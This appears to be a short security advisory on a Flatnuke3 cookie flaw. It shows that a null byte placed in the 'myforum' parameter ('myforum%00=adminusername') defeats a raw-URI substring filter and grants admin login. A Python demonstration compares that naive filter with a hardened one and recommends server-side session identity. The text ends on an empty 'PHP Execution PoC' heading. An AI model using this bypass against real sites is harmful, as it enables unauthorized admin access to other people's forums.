Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org
Flatnuke3 Remote Cookie Manipulation / Privilege Escalation
#By KiNgOfThEwOrLd
PoC:
When a user logs in, Flatnuke gives him a cookie of the form myforum=username. If we try to change it, Flatnuke asks us to log in again. The check that does this is:
$req = $_SERVER["REQUEST_URI"];     // raw request line, still percent-encoded
if (strstr($req, "myforum="))       // case-sensitive substring match only
    die(_NONPUOI);
The filter looks only at the raw, still percent-encoded REQUEST_URI for the literal string "myforum=". Putting a null byte (%00) between the parameter name and the "=" breaks that substring match, while the application still treats the value as myforum, so we can bypass the filter and log in as admin. For example, replace:
myforum=yourusername
with:
myforum%00=adminusername
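The following is an added example, not code from the advisory or from Flatnuke: it models the raw-URI substring filter above and shows why "myforum%00=" slips past it, then checks the request the way the filter should have, by decoding the query string and comparing normalized parameter names. The path "/forum.php" and the sample requests are constructed for the demonstration.

```python
from urllib.parse import urlsplit, parse_qsl


def naive_filter_blocks(request_uri: str) -> bool:
    """Model of the Flatnuke check: strstr($_SERVER["REQUEST_URI"], "myforum=").

    It works on the raw, still percent-encoded request line, so any encoding
    that breaks up the literal "myforum=" is not seen.
    """
    return "myforum=" in request_uri


def decoded_param_names(request_uri: str) -> list:
    """Return the decoded parameter names of the request, as the app would see them."""
    query = urlsplit(request_uri).query
    return [name for name, _ in parse_qsl(query, keep_blank_values=True)]


def hardened_filter_blocks(request_uri: str) -> bool:
    """Decode first, then compare names after stripping NUL bytes and case.

    This is still a blocklist; the real fix is to never take the logged-in
    identity from anything the client sends (see note below).
    """
    for name in decoded_param_names(request_uri):
        normalized = name.replace("\x00", "").strip().lower()
        if normalized == "myforum":
            return True
    return False


def compare(request_uri: str) -> dict:
    """Run both filters on one constructed request and report the outcome."""
    return {
        "uri": request_uri,
        "naive_blocks": naive_filter_blocks(request_uri),
        "hardened_blocks": hardened_filter_blocks(request_uri),
        "names_seen_by_app": decoded_param_names(request_uri),
    }


if __name__ == "__main__":
    # Constructed sample requests (hypothetical path /forum.php).
    for uri in ("/forum.php?myforum=yourusername",
                "/forum.php?myforum%00=adminusername",
                "/forum.php?topic=3"):
        print(compare(uri))
```

Running this shows the plain "myforum=" request is rejected by both filters, the "myforum%00=" request passes the naive filter but not the hardened one, and the decoded name the application receives is "myforum\x00". Stripping the NUL byte only closes this particular encoding trick; a client-supplied cookie or parameter should never be used as the authenticated username in the first place, and the session identity should be kept server-side.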
PHP Execution PoC: